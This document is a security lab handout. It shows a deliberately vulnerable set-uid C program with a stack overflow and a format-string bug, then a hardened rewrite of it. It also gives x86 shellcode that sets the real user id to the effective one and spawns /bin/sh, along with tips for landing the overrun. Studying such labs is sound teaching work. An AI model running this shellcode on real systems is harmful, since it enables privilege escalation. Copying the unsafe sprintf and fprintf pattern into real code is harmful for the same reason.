This lab is in the form of a virtual machine that you can run with the tools Oracle VirtualBox or VMware Player.
Further instructions and a list of deliverables are contained in the file instructions.txt, which is included in the virtual machine.
The Virtual Machine is available in two formats:
This program is compiled and installed with the set-uid flag of the user r00t.

    #include <stdio.h>
    #include <stdlib.h>

    #define HOSTNAMELEN 256
    #define IPADDR 1
    #define HOSTNAME 2
    #define ALIAS 3
    #define HOSTFILE "/home/r00t/hosts"

    void add_alias(char *ip, char *hostname, char *alias) {
        char formatbuffer[256];
        FILE *file;

        /* unbounded write of the three arguments into a 256-byte stack buffer */
        sprintf(formatbuffer, "%s\t%s\t%s\n", ip, hostname, alias);

        file = fopen(HOSTFILE, "a");
        if (file == NULL) {
            perror("fopen");
            exit(EXIT_FAILURE);
        }
        /* the user-controlled line is passed as the format string itself */
        fprintf(file, formatbuffer);
        if (fclose(file) != 0) {
            perror("close");
            exit(EXIT_FAILURE);
        }
    }

    int main(int argc, char *argv[]) {
        if (argc != 4) {
            printf("Usage: %s ipaddress hostname alias \n", argv[0]);
            exit(EXIT_FAILURE);
        }
        add_alias(argv[IPADDR], argv[HOSTNAME], argv[ALIAS]);
        return(0);
    }
> ls -l /usr/bin/addhostalias
-rwsr-xr-x 1 r00t r00t 14512 Apr 5 11:48 /usr/bin/addhostalias
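The program above is weak in two places: sprintf copies an unbounded amount of argument data into the 256-byte stack buffer formatbuffer, and fprintf(file, formatbuffer) then treats that user-controlled line as a format string. The following hardened rewrite of add_alias is added here as an example and is not part of the lab's virtual machine (the names format_alias_line, write_alias_line, add_alias_safe and LINE_MAX_LEN are introduced here); it bounds the write with snprintf, rejects lines that do not fit instead of overwriting the stack, and writes the data with fputs so it is never interpreted as a format.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOSTFILE "/home/r00t/hosts"   /* same path as the lab program */
#define LINE_MAX_LEN 256              /* assumed line limit, matches the original buffer */

/* Build "ip\thostname\talias\n" into out. Returns 0 on success and -1 if
 * the line would not fit; snprintf never writes past outlen bytes. */
int format_alias_line(char *out, size_t outlen,
                      const char *ip, const char *hostname, const char *alias) {
    int n = snprintf(out, outlen, "%s\t%s\t%s\n", ip, hostname, alias);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen > 0) out[0] = '\0';   /* leave nothing half-written behind */
        return -1;
    }
    return 0;
}

/* Append one line to an already opened stream. The data goes through
 * fputs, so '%' sequences in ip, hostname or alias stay literal text. */
int write_alias_line(FILE *file, const char *ip, const char *hostname, const char *alias) {
    char line[LINE_MAX_LEN];
    if (format_alias_line(line, sizeof line, ip, hostname, alias) != 0)
        return -1;
    if (fputs(line, file) == EOF)
        return -1;
    return 0;
}

/* Hardened replacement for the lab's add_alias(): same file and format,
 * but an oversized line is reported as an error rather than overflowing. */
int add_alias_safe(const char *ip, const char *hostname, const char *alias) {
    FILE *file = fopen(HOSTFILE, "a");
    if (file == NULL) { perror("fopen"); return -1; }
    int rc = write_alias_line(file, ip, hostname, alias);
    if (fclose(file) != 0) { perror("fclose"); rc = -1; }
    return rc;
}

int main(int argc, char *argv[]) {
    if (argc != 4) {
        fprintf(stderr, "Usage: %s ipaddress hostname alias\n", argv[0]);
        return EXIT_FAILURE;
    }
    return add_alias_safe(argv[1], argv[2], argv[3]) == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```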
The following shellcode is useful to build a buffer overrun. It avoids NUL characters and fits in the buffer of the vulnerable program. This file, and a Python/Perl compatible version, are included in the virtual machine.
    #ifndef _SHELLCODE_H
    #define _SHELLCODE_H
    static char shellcode[] =
        "\xb9\xff\xff\xff\xff"     // ecx = -1: the effective id is left unchanged
        "\x31\xc0"
        "\xb0\x31"
        "\xcd\x80"                 // geteuid()
        "\x89\xc3"                 // copy the value to ebx
        "\x31\xc0"
        "\xb0\x46"
        "\xcd\x80"                 // setreuid(): sets real user id from effective user id
        "\x31\xc0"
        "\xb0\x32"
        "\xcd\x80"                 // getegid()
        "\x89\xc3"                 // copy the value to ebx
        "\xb0\x31"
        "\xb0\x47"
        "\xcd\x80"                 // setregid(): sets real group id from effective group id
        "\x31\xc0"
        "\x31\xd2"
        "\x52"
        "\x68\x2f\x2f\x73\x68"     // "//sh"
        "\x68\x2f\x62\x69\x6e"     // "/bin"
        "\x89\xe3"
        "\x52"
        "\x53"
        "\x89\xe1"
        "\xb0\x0b"
        "\xcd\x80"                 // execve("/bin//sh", ...): starts the new shell
        "\x31\xc0"
        "\x40"
        "\xcd\x80";                // exit()
    #endif /* _SHELLCODE_H */
Beware that solutions based on the Smashing The Stack For Fun And Profit tutorial are sensitive to the size of the environment. The shellcode used will start a new shell, and does not exit it even if the r00ting fails. This means that, in the next attempt, you might be running in a nested shell and, therefore, in a different environment. The offset number depends on the stack addresses in that environment. If your exploit succeeds in some deeply nested shell, it might not be reproducible later.